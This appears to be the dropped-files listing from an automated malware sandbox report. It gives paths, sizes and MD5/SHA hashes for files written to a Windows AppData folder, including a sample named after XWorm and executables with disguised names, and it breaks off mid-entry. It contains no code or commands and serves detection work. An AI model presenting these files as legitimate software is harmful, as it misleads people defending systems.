C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\DeviceId.Windows.dll

Filesize
6KB

MD5
3ff56a2f436a279559e2d4a343239356

SHA1
b09891bf7475265fabd42f8b7122f6709ad4e91c

SHA256
ef981b227873f60d22fd84e6dc714566c88b7133b630ac379162712066aa491d

SHA512
a2b1390e6753dc898ff740a490d82fc7c97ec1e6b0936a8db6ebaa20b4240a9413a4b9f18a0840fc781325fed5e0cfda2496d0e0f00209b55ff4951cac942c6e

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\DeviceId.dll

Filesize
19KB

MD5
9b3f820aca84291ff76d35ba4c2c5a34

SHA1
f6c595ed4de9391549236ca5b2349a1cc5ece66f

SHA256
4b121c60103934fbe995b3b56553dcd54768888c277dee4f7ba98d4cb54b6cd7

SHA512
f2fd2fa1e55b36bedb906e6601854661bbcd5e7d14d0c2a241b4b5b7a761a093cadded373c29a3646d3edf86e0e6d632d1deb216726239fa3b0a7940d1fddbca

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Hardcodet.NotifyIcon.Wpf.dll

Filesize
71KB

MD5
dab8cf178bee4c96ab526b358ccdb38f

SHA1
9a9b442da608c2f7bbf259269661fadffcd34e2c

SHA256
c1d9f913941ee1c7323cea5a4b70c4501cb7566313565d64d5817d11e2e3159e

SHA512
e78b5ab5eda63239e1a5b32b63f23a352bc2fef3e39f0f0beffce4c7368a1c6b162b3bee2d54c2920e2585f42c55ffee771adec2d5dc9dde052fe452fdc3735a

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Hardcodet.NotifyIcon.Wpf.dll

Filesize
95KB

MD5
19a7b24aa7b0571a7275c871074029c3

SHA1
3a8368af2139cba5e3a74424c3a7566ce5981b96

SHA256
8ff1781b13697746afb16273e77cec2accb8250a0c8238d95d4840391cfb8233

SHA512
563e572bafc0bae10e0df3a44b835bc648b3781217c89477e67e66dba24fcf6757b19b84dd281c0172e8771d9a890a15e8637d63df78f1846218115c52c827be

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Microsoft.AppCenter.Analytics.dll

Filesize
24KB

MD5
5d60fae0323c73aecf3b997c2faa08ca

SHA1
877a3871f4f866500d0de806fe121bae090cce0b

SHA256
1ef2215c1c9db9ea010c8f6461febf860f57b7cbc7cdb0dcb67bed10d0fd7165

SHA512
db80f9aac235869bd47d4e0caa765bb3ac8396479824278a651d0e65ef6c8a4f276674648ecceb8d8f3c30831fb7e58f05b78f6ad11005fb962c2b18419e0562

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Microsoft.AppCenter.Crashes.dll

Filesize
52KB

MD5
9b884ada1fde0e961204b575e68d1461

SHA1
63e60a6a0c072df481041d480e0ad0c5305f585b

SHA256
d41332aecc4830cce6cdde7aa6f17db4c28e12116352cd001bd283c615fac44d

SHA512
d391a7044766994e16794f7930d61649d4a5761d1c2cb63cbe43ae13e772806863427b751f32991271777ba82fb1375b46827f1b0494f630d5f5ab4792b6576f

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Microsoft.AppCenter.dll

Filesize
74KB

MD5
a277dda8177eb0bd0759fe926d687470

SHA1
b51f06a4a50acdbeb0f71d3d7f08dac300168b95

SHA256
9cc7b648cd7955056dee8fed3cbe47b16f0573181cb5518e61f208cee9fb409a

SHA512
a30f7a586db5aed03042f71b847e95d01a89b8e43cae75c8d830da0f4f2ac17686984357369c2949ecf9fd20a0f6ad666833ee77791c7550ac0a4b0552a22765

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Microsoft.AppCenter.dll

Filesize
44KB

MD5
481c315bb4fedbc884cc004555706145

SHA1
cbfd799e0edb7fdf0e19bc014511aa96507b37f2

SHA256
cb38e1ab126e2882f85c4eabe1a25f8cfa6017632c2275501e506403b5bf08b2

SHA512
48a5ba7c4fc3703c6410272507965e69bc3c5c24cb843680bdd5a1b01cb2d25fff335d069931d522fbfa977c4aa092d5dcaefd61746fe82de136e3d97b7df989

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Microsoft.AppCenter.dll

Filesize
124KB

MD5
8d09921548846d5d480be833fae3628d

SHA1
775ac5111dcecf38a5f647d08f08458d4a5e304d

SHA256
f38c69ed9ca97844e8f1b6035db3189b6638cabe1281f1d612199ba5c2e09b81

SHA512
c602f8387fe949fe045d54d2f2790c88cafc32d60a6d43ce2d1e11258d67030403bd1f527d2fcbc1cbfdca5ff1311f846fa453b0126e9a971aec2cde8234f33e

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Newtonsoft.Json.dll

Filesize
107KB

MD5
bf571ec1da596313a2e2302f7ebe4472

SHA1
50060fae9b59ce54e3d0d362963517ab238d8215

SHA256
d2e5e7d98af57ff690fae843898f9f4762bda466cf6a789b964f3dfb84e39724

SHA512
6fc519bc08330f6cd8e66f7d2ca6be299e5759f32b6ecfae043fa869a0328e1993e59fb67e168e45c2cbe7acf945cb214662ffa318d72a67ea5c0d7096bb2bd8

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Newtonsoft.Json.dll

Filesize
92KB

MD5
8bd3a5d71bb33143e4b6fb0bb28fb837

SHA1
da1ab4a146db9f8e499c252ab953eb7d9808d980

SHA256
342b0db8dfca4f1c327d201be4ab4fda5680beb6e722c226e3a926946382941d

SHA512
5d42c4828ead61ab720b07733a74961c5b84e876f9064a61414069513004901f9ecf8b659eaa476fe9af69c7c286c92fbe601a8e4db9194e377c77076a7ad7d1

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Newtonsoft.Json.dll

Filesize
84KB

MD5
a24f61a4dd23c0879a9b5de71d758817

SHA1
be365fa3fe452a4f404a970ed352b108f0ab4598

SHA256
741159cad131a292a6cb7ed27ceca7680f9ecf4fe683a1f4ba7ea5e62bb74f90

SHA512
1e23c4f93f70e7b4d7cacc082227350527705cb1c7f67ba7cc255e7afe2467b0c42869821fa9336c623368cfeb7e14f1d9dec1ab6d44d843b5d5ec874ca2dd24

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\NuGet.Squirrel.dll

Filesize
54KB

MD5
4a1834c0b2dc04e8ccffcc8526b71974

SHA1
c711b2b4f1f49db0ac49da3a584947868815b79f

SHA256
0629b131b21c078a474be0ce04c462cfc4ae00be065262fc5f3fccd7b029e519

SHA512
c2bf9781eabd1b07fd283b3398302e6505a50de9636cdf56675d2f9eed4987da28b98fc6b02846bdc73f4f6e77106eefa97f1827cf2d2dc12d8ae977219d4ddb

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\NuGet.Squirrel.dll

Filesize
161KB

MD5
0da8829ba3bf495b3cfc940768be772f

SHA1
4e0120aca4d02a6895b0d4140ceab51fc519e085

SHA256
d2fa96b4d515405f91ed1118503132bc44dae8e67eb54a1211c4d8b94907a1d9

SHA512
6121b4d44697778b0cd150c5a229a91e6eab24af39c3249e0fc8e4ef0fb898fcbf1c7a4668230e57641b6ca87bd0ed5176427d2653a8c5b359ae01d406349d58

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\NuGet.Squirrel.dll

Filesize
73KB

MD5
5bc6c89b9bdbd59160211f08c448242f

SHA1
5766951b527bf73b31452128a73aa6fb1ec0568e

SHA256
a1de4f28145f652cd2a676480849f285c33c5092d16cbb11278a8012c2f15c4d

SHA512
5d93d13e406e7919a0b3890851c1204737c6525c8af2b1eb0a0962c760e895a1f4e36344d3c8b16a07dbed83621839ddb7de18ee5a0cb269346c85a7d3693c81

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\SQLitePCLRaw.batteries_v2.dll

Filesize
11KB

MD5
7d9bb7ad7644bcd2da7286b0daeeeb12

SHA1
c3fb732ea00b615ff0ed8e1388f02fc11e851fa0

SHA256
89da4e64bfe2e772605abe6c73fb1473f5221cdea3f36860dd3e434a365ad94e

SHA512
e865afc9f8686bbe7f2cdc88c74fca2f4e182cb47fb87c2e3c1fe285cf636b8c1f553186c2c96741f7930576736e263b5c9bfaf88483fcc6507ec4b86f5df0de

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\SQLitePCLRaw.core.dll

Filesize
42KB

MD5
1cef410a56f08809da9eac31d4ee572a

SHA1
6575eb209958bf6fee3347c2eea5a531ce0bdb32

SHA256
aed22207214d5bbe36d8fe9546a24f0b13fa845887939f638f2154193b9aaead

SHA512
dcd33c5b3e9dfe9789bd65b07a450888b55de2aab66fec126837249d9d99ba973ea659585cfe548762921e402f2d01cdea1e49cab0fdb3be0f27f222263fa1f2

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\SQLitePCLRaw.core.dll

Filesize
49KB

MD5
13903dca676ca64697f26cedfd5480b2

SHA1
4ec3463331259d01ed21bdb5793674e933588694

SHA256
0a418e3323a3a76678c912c39b2fbac7ad4fc71bf3eb870fc0337333ca64e7c5

SHA512
d834f6cb0c3c26d3b45f6bf597188722678f65f45bf8173906d8c61ef989d826ac28efac920627c7b7a105398878c2266e16f80d333a73b0e6a6d081cf4a91d6

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Squirrel.dll

Filesize
89KB

MD5
4f1752994bebb283fade742302327328

SHA1
60e07ec0860a6961605d0b135c219d859d9a475d

SHA256
fe945e6e2ea63b44a9983f9af7692494cb1b631cc62d4e416a498843cfefda4f

SHA512
f789836f99cce32b3c3d74b63d589d06017331b49ffa3ef9e742af11a260232894ad14790c5ca0d161ecd95b9eacffdef6083144a65b08bebd1d785b7f0c288e

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Squirrel.dll

Filesize
115KB

MD5
5f0011b5dc6dcc0c9b07ece1b6a63e0c

SHA1
344caafd0f366ecca41b358c90b93dffa7c28f54

SHA256
f9d7434c2a347be56cd7c551bfd5cf4aa5f994e918fee7a5bedab417605e36c0

SHA512
db31c9652ab208ad0350b26f129075f6eddcd9307ab7abd2367d178395ddaaaf0554d80fac1adaae26b12a9bec41ed0238fa977056be24bd8b46fb196abe8b43

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\Squirrel.dll

Filesize
127KB

MD5
e95021953dc88f59de269d6360d9a00b

SHA1
8803c7754bb78b326094c221d228b9ec1d51ca48

SHA256
afd20aab2e2931777414abd0f024b5980f14d80d361c3ef0966d96cd99a055fb

SHA512
bcdde5f88ddb38c2c60778f5857edc7859ebac430086e9df451af5c5cff84a41c64bb825782e39e7cba668b0267d8c892e0cbc3ad11e40dfce87b5b78ec81fc0

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
115KB

MD5
3c1fc4160cd7a8f4b29941223f2530c7

SHA1
9419549af832fb722f6dff1b3d4692f234803b4f

SHA256
2e1e0af11b8ea5afe15e0919293b5a3848881af4e50e440d5962ff71023aa2c5

SHA512
15d52b9cd84f7a019566b1d0208812b7c362822f4d5b90e81daf068c88340584ef280ca21e1b5fa165c41356ff9a687e07515417c098fa780050c1d7fe32fcbc

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
57KB

MD5
bba8c45b8e33afb71c36e60ba2a1b4ea

SHA1
a05e08a3f617c7ac9d4e2882903a9f673ca712ce

SHA256
19eb08f13cae8c55af72fc7c05111cad4f576d677e60114797a061ee897121fc

SHA512
7152602bf3797c6259c156bfc5946480f79f907c1095983bd928babf3be33783e2389f1386f38ba743eb2c99073f7b118ce249d2591744dc974d7dee5ee05e57

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe

Filesize
128KB

MD5
43556b608409b0929fdde76c849731ba

SHA1
98b3aacd7f7c6a29bafba36c3100bc01d812b5e9

SHA256
dc54bd7980b4517a1ae1b012d3b4015bb522ad750dddbbb97712625c248032f0

SHA512
4bc47a70947432feec0ee6bdc38306aa0983406ee48371f6d6a278778c0158694f9ae4059d2e3e813007a415e6190c853f26fe25dcc070f3579605ffc16eda75

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.5-full.nupkg

Filesize
53KB

MD5
e9f1a0d70878e6114a2cf0dd849808fb

SHA1
a24dfda1df80938153a5b33da2fc4621d107b5e7

SHA256
8396f85ccb9d5136e2ddeb8541672521d1543074b4e659c0a45fdf6629a740be

SHA512
6cb2e32e9f4fde0e67576e04393bdd1a37e9cdcac8efa798da4b7b91555b1e42a84d235900f097813029c4c48163fe92bbb1a1be95c91074aefc5fd4f44a2555

Download Submit
C:\Users\Admin\AppData\Local\CoinSurf\packages\CoinSurf.WPF-1.0.7-full.nupkg

Filesize
85KB

MD5
c78e9bf4d7f19e54e4da0d554197db38

SHA1
b441e3958f064200cc17b1f940ad8be07c03c54c

SHA256
3cf93eb9de147c3c32f784c254b08cd4ad4b8bb3e8850856b1bfd07a67e0ef9a

SHA512
b449d1fadf32de9b74c9909c1f299ba6de5bc7b7fe1ecf15eb2372e39dd433462550fbeafc532fb8ae2164975b115046ac51501a529913a49f7453605bf0994d

Download Submit
C:\Users\Admin\AppData\Local\MPV-EASY Player\is-58SVG.tmp

Filesize
122KB

MD5
6231b452e676ade27ca0ceb3a3cf874a

SHA1
f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1

SHA256
9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf

SHA512
f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

Download Submit
C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe

Filesize
625KB

MD5
6cd6c1bde2fbb323edcb88f4e5a76dae

SHA1
0afd2e87af49ded2a5e73b9046476591beb387c6

SHA256
c8b7edc7566f136709ecf212b7bcf2faa7a34dc69f4c73c996ffd1bb9eee64cc

SHA512
b32bb17416869315aaaf6d4f08461108b33fd0f1bd3d5c374547c425a16db86e5407f7a5ff85630453eaaf544902f4929b0661852649f1facb874cb31e55fdd6

Download Submit
C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe

Filesize
680KB

MD5
7438adbad2a74bbee6ce6194d0a01353

SHA1
70e475f2b4c8b96f0eb6566dd7ae7fdc05b992d1

SHA256
91b99b77001d354ac53f132633c870480eb3472e8c19da20207b6eff4b2d1261

SHA512
e1de33899f1ff17fff11fa64394ffcaa6bec17ed1aa1aa0af2d845c3c5054e9f5c36d3af93a23ff9e58807ef9cf7b7e44f9f329cd6a733aba964b3c19c7384be

Download Submit
C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe

Filesize
597KB

MD5
ce1374c1cba141704ac5ee4fbe69bbc5

SHA1
35b18f6f79033aae447512797379977ba1dbeb25

SHA256
3496054c41dfc2acbcc7e8b6295fdb991b87bdd74c4f5271b90b59ea195413da

SHA512
cd9a0dd00462bc6ad26883d8d81109b98a9be1a7b008dfca5ed697c59bf88ed5db7e1dbeb2513a70b53aa68005428be9c692bb82460bd678f96755190a488119

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\CoinSurf.WPF-1.0.5-full.nupkg

Filesize
103KB

MD5
6693b6eb0c03eaa9845a10df5da48e15

SHA1
7f4381d8e67d8ecf135e995f95a758f0dd713fe0

SHA256
5f3e32408d8c79e6192f170d6527bfc4e80b2ebab007bdb7aecb23d9e960ece2

SHA512
a0152d15f0c98630497fc14ca8e1efd7f9bf7f5d9985af6ae947dd35f46b0c533d42836453fa8fdda758f50b6f0890e12e64b4a894e2aad11e204c458c3f7531

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\RELEASES

Filesize
81B

MD5
6e53883dcc461c3f40be461613f9a3e5

SHA1
6f963dacfe384c8699cb93db4e7d2126b86209a2

SHA256
a4fa5be57f7b90ac2fae58799e313e4f9c12b31fdf4fdaed3e7078cd67470f39

SHA512
dcac88983a7e0191e1e7235e9ef6dde77aff236e34c2bf3bbe49981aa99fd62c5fcc371d3479d0fe4d190c8f202324ac8a6123cca12d1bbcd250b40b27529aa1

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
78KB

MD5
1f94f744e47e730f701df27fa332aa65

SHA1
8d8f618a12e56f4630092afd246d02ad3ef7e0d4

SHA256
e2f08e5cf25b75e788186c43fc5ebb257a2180e5dc4e65c56ff0ba50d5a751fe

SHA512
c4cb5dde69c0d19fab6fc07cf430792d313801c879f41021fbeac7e867d72d049cdc621dace51340d98b672fffe2685a3cd11fb52015ef1f3d257001f2d6150b

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
92KB

MD5
95c8fa3f282c9db610f37371013a1df7

SHA1
095e874de030496e8493439d0fad5bf49214c4ff

SHA256
9228622d743c5025bd22704083dfdb36ec7ab2c2bafe8e4f65c20c0d5b22ccb0

SHA512
2e9f0dff1c78eb9f0fbb2bb81125ea72dd582f819e10dda49ae97e6781432a5cf34c63ddbcb383373d9805ccdf6409a3ba868f009fd111585ba5788164efd723

Download Submit
C:\Users\Admin\AppData\Local\Temp\BBLb.exe

Filesize
1.2MB

MD5
71eb1bc6e6da380c1cb552d78b391b2a

SHA1
df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d

SHA256
cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6

SHA512
d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe

Filesize
798KB

MD5
90aadf2247149996ae443e2c82af3730

SHA1
050b7eba825412b24e3f02d76d7da5ae97e10502

SHA256
ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

SHA512
eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe

Filesize
114KB

MD5
c77fb6235fa40b13509c25f8aca8da6b

SHA1
af2c0a134a6deb56bfd7b9c54124ec8ffb30a7b6

SHA256
4bb0daf6ad46380eb905da9f586d108f9a9e7bd83c31d7903824ebe3abd65fb0

SHA512
57240e1b8f378c8e3d4524c16a6d95529a44de782c8029fe2458450b5a9881dd94241b70b8582379ae9079c5f5989c470b150d9949ed8b6be47f5e0799f64a0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe

Filesize
123KB

MD5
f2b5ede44245b58ef8ab0ae6747d671c

SHA1
677341295a0be42c9dff30291a9f9de3dca7b46d

SHA256
0f7689f46fc654b5256e19221b47f18847fae658f3660064709ee54862992526

SHA512
a94c9f98d2758785d1fca7461afc05c77849ca4ebf4a31a4d2281f2ef25e4369e7e2577de4bf2b4450e2f648d783c02d83c0284602a655f948836f5cf304e071

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe

Filesize
817KB

MD5
9e870f801dd759298a34be67b104d930

SHA1
c770dab38fce750094a42b1d26311fe135e961ba

SHA256
6f1f83697d8caf1ac3cf0c3b05913633d49e756ed17189efc32cb0a6c3820e6b

SHA512
f0719d751e71229369ba9c49eee649e130f8eed7e7b662c724f8e7b25a950d77d4ba69aa967394d007561383ca64b95bcb0f466dfc7e1d4e00bf9e3829c957bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Nhnsunywskn.exe

Filesize
66KB

MD5
b92ccdee4dd1e6479570ce7305522854

SHA1
adbbf48914d7b37fc5b1578b20f58d47862bb733

SHA256
9c01102383236a413baaa83083a794d2054b8588704bb21bc6c74c493b545bc4

SHA512
e0d00e194f0de77e0eaa62741c2f6c74affef6ee129955c5a3b87fddd7b390e03e6562f4031177cb036306d60624735eeda6beb2764df1b7472d8d5aaf41df9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe

Filesize
72KB

MD5
19641940c87adf2e125b5b85f8d242a7

SHA1
dd76a18cc6826b3a4a64eedca2dc9026714a3d9e

SHA256
6eadbbb4368eb760df9ccec6ea44a3d6b63c05f224738dc0e7c06db528ba85f8

SHA512
e498e110e84db19e0277401d833080931439c1f846bbb8297c93c0bbb25f6f74146994af67a96a4abcdd42d9a62145c8ebff9b7ddf9a9bb3d1ab156a6a9600c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe

Filesize
62KB

MD5
3d080d0dc756cbeb6a61d27ed439cd70

SHA1
73e569145da0e175027ebcce74bdd36fa1716400

SHA256
13f4edd9daec792ad8232182ead32680d3eba69f220ccc4466862b64c958e57d

SHA512
e1834027af66da28ce1feccf8fd036325072de1828fb89b467a05960837ca4b0fd24ba83a8c7d7940bfc6791d2d4e988057d24079affa6331b676be00b39f473

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe

Filesize
128KB

MD5
5d82fd258858e42f023b241ed870411e

SHA1
5264241fbb20d4f4ecbc597658308874e308242a

SHA256
8aac2c8cc324c2b51e968ed3649a4409c5d0c6cbacf9cfcc842a3cb26236ada2

SHA512
5fb0c9c1f9bb0899eae5a8b0d60967b54836c082489b9034f65bd30c874f73ee437a8d4da88982cafa2411b3f1553f960f2d4a5ac496c9ca6220d405243260e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\amin.exe

Filesize
354B

MD5
6d984706c32d54ce80613fd44050827e

SHA1
01466d3e29980c2e77f91649c3b6eebcb24987af

SHA256
ffd0acb3fd6323ce6a2a10d98bc4dfd051d86934207c1f9c04bf2f532016e23e

SHA512
f8dafa44ca40f6d31f402643220397fa978ba2999e6c7854a0ecbfefa5f937c0966af9f19ed2439d24efafdf4bf3e2d7a4e3eb84b3e5877037f6c93e6b129559

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\april.exe

Filesize
808KB

MD5
8d355562ed5869534768b30488f6ff15

SHA1
f5aae97ef08d2e6ce397797938ff1e671a0e6433

SHA256
ce65c3a9d9ef9c85ea6020e80a55c0e465b4b8b425f4c074ee7d81502d7940d6

SHA512
6e096deec4119562eed3df3b8ad245edf38b0d47b607a4f404830e915c8604bc92dcdd4a6b98502aa2616d578084519d2097fc9d0fada4cb114174ad77260b87

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\april.exe

Filesize
1.2MB

MD5
9e1bb2e61b1126c7c72adcb90fd6b5b0

SHA1
dc8698a30896ebeee642d8a824224587a0b6f12f

SHA256
a356246651bb5d8b3c8498be0c2752f2b9d1de4e7d53d588a1b29477c4732a01

SHA512
e905ebf5b258e5c60330ae42a1690b240c10eb0d129116f28476a1a9592997a22dbf2af49efa79c004e5875028aa6a149989d4bed6086cd38aab509f1a8f5d13

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\april.exe

Filesize
1.3MB

MD5
29c0bf8202bc4c0fb8df69999d1d5268

SHA1
7c6749f72774dadc9ad899362e3c9bf19c1d13a6

SHA256
d4b128f7f487b8cccf582d386866319d7b23455aac9fb7da0428b7f14457cea7

SHA512
7316b17f68775cfff9366adb212f3c7bc1de10fecc6cba229dde05d2f2c9c8bda3270d47782252945ac7560a462ba31271371cb96e88e1883b9303d131fc0a95

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe

Filesize
88KB

MD5
1d39a2d91d2926476de1656376b5758f

SHA1
d1d298c3d112c73599c48b9a300aab393c5d0c2d

SHA256
c11fc9f4b2fb0f3e470942e05e392715ca9dc18a8ce0a3ed05a1e46304ad6201

SHA512
38f0d24d7e628aaf61a632059108edc2baae2370cc2a26f866803735976752ca5ebf4a1888779b90a3fd3836bb6d0eb77e52de82310579b528be2879be50b201

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe

Filesize
79KB

MD5
e05676531e50bed0e0dfad535b6e384a

SHA1
1b90f90849597c93c34052df8e5f5b4d47d8166e

SHA256
f8b4bcdd592936872f8b5644df7650da3a11730a4dc0ce6d7ba912cb79a71bdc

SHA512
e55c9779c9ea300748a377813c4b1c79e9be9e649127a7ff5f973c275f4bfaccc16e14186d31064be89645b720d9f4f24cd514df13777ee5160a6c867e6b35bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\costa.exe

Filesize
5.1MB

MD5
a905a8300756242be9186959983b2272

SHA1
5b683c0df2d9ffb78fbcb8e57431a2b829250ef3

SHA256
566905f5ebaa7cc500765f9652734f88654999ac693c42fd3744cfc6b303d231

SHA512
0457a4d765d5fff1874018d5e250a2ca1a1868cb32279300706d31f0655ec8de9aef38058aec04a3ca65f1a52da3b54c10a2476b4e0d0565de7845718aedee1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe

Filesize
1.8MB

MD5
97256cf11c9109c24fde65395fef1306

SHA1
e60278d8383912f03f25e3f92bf558e2a33f229d

SHA256
21c23083404349dbc8e7094338acaa07ea5a7e3a442bb81a528e06c175b8d934

SHA512
41e9c7911c1f461ec389ac9d430898bd9e21accf6b4291d30c4e743084bb19c2ae9279597f4a43cfaec621263cb135c3ada21e23e27cc7961c794fa499910c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe

Filesize
71KB

MD5
2d282d27b9d5cebabedc24839fbea9e3

SHA1
081bcb97f2e16444917dfc2d2629d5c33c465ea6

SHA256
0caa81f59f5512b51c776ee9c0bdeb7e5fecb15d5093d08e3775f863b740d635

SHA512
8473ba453fecd21a68773fc0aeda6071f8679566d82fac3171dd549b58f462ffb25e2dda1e74aa9e27b6a6f25d84127072cb1434607c1dd20c2ee85850bafc07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe

Filesize
70KB

MD5
c1c49fdc597faf3c69eee489e525ac28

SHA1
7b8db10c7cd48dc360c44fb7d7d641f3306c1b19

SHA256
42b6714dd2fcb713cf248b0eeb9c9081d07d99d6d65b3f888ee9aba594a1be83

SHA512
a47917339b70b6a82b4cb46d8b047ec78b41bc977324bb4207e3a2bec9f53c3d096476cbefde74bfe0e719f6ec29aecec9b69d61e13074d1fcce4b618e75d8eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe

Filesize
151KB

MD5
55fe6640cee16c967b1a5dd17ee53aee

SHA1
04e87f2b900aea30af1b8dc22afdb9bceec33b19

SHA256
f45f0227c68976f609ad76b8d607ad37762435b3491eac359096bccbbc308448

SHA512
911913be39e6ed404f17df88dd0f890a9ea802ffc5af42d715f61fbb04fa1858433949048c38d38633618d6ac04d7a0218a21e18c7deae11727b7b984c6b9da3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\discord.exe

Filesize
125KB

MD5
32e47115992b629cdaeed5231b5c12ba

SHA1
f309f08b516fbec365a976f19fd5079474dbdbf6

SHA256
7f3ed426e960c2607e357914b6626f65b38e6bd34cca3c8b0fd10bad36d9613a

SHA512
4796ac704297cd611a0075d754d731e2717f8aa080434e8d026827b9f3f9e497b9e147fd7391f90de4944afd3c86188ab8bccceea053a44cc606032b295fc5e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe

Filesize
1.1MB

MD5
fd56003e981a6e7f990c8316ef998836

SHA1
08861c50ef180cbdbe33c828915725aa4e053125

SHA256
2781b6aadb0367405728382be767099e05f665feab0338f05b9a64b48b59749f

SHA512
9ef1d525343e98cfee304a3bb56ea6f7b266142ec34a2331cd2dfce767fd6cc3c6336c960fd5da4a679c026ad342ec2171d3a3243ef189630e03afa20e52a621

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe

Filesize
63KB

MD5
730f4a3f8bcca60af1c33c18bcd0d7bf

SHA1
34c4b5e4fa954a1c709748952f5c5dfd15f545ef

SHA256
80b1f0a626edd9879f3fa00d0266d8b239a7ee810a370304a1b509d21d6f5f0d

SHA512
fa1dbc4271302b9108430f5e5df4de5d053a63c1749a596272c7339a4596d15870ab3743a468b24c0b24e7a4939be0186aac22d41128ee5e6ab3aa9a3b1c44d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\first.exe

Filesize
66KB

MD5
8063f5bf899b386530ad3399f0c5f2a1

SHA1
901454bb522a8076399eac5ea8c0573ff25dd8b8

SHA256
12aa47db9b5a1c6fddc382e09046d0f48fbdce4b0736b1d5cfcf6f1018fdd621

SHA512
c9e4e9e5efb7e5def5ae35047e4a6b6a80174eade2a2d64137f00e20d14e348c5852f9c1bac24d5dee4a6d43049b51517f677d504fbb9a413704eb9985f44f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\for.exe

Filesize
128KB

MD5
702fc8a21f8fa5b56ec765dd8d0a08a2

SHA1
e54ad7d783e5f18b68693a2d9aafde7f556e2fd6

SHA256
f0635f4d888608d0e4010455cfd679f5240d2aa66ab8280c9d1271aa67a915b5

SHA512
13bc6fb1ab5d9ea393c7a53b7d392c80c5c58fa1aca763f3fe4228c1c1f8234ef0bb389bca08b388c3cdf53e22166c50f1fdc08ff55d2f1b9e0d7a09d0877b41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\freas.exe

Filesize
413B

MD5
ff9a424db5b1009288834dd53afaa9f7

SHA1
a2aca5d3b27c49f5d8f8d53dbd2530536b505b35

SHA256
5c68063d120fc318f49435b99009d0340887cec565b59398a29a3b13260c1b2c

SHA512
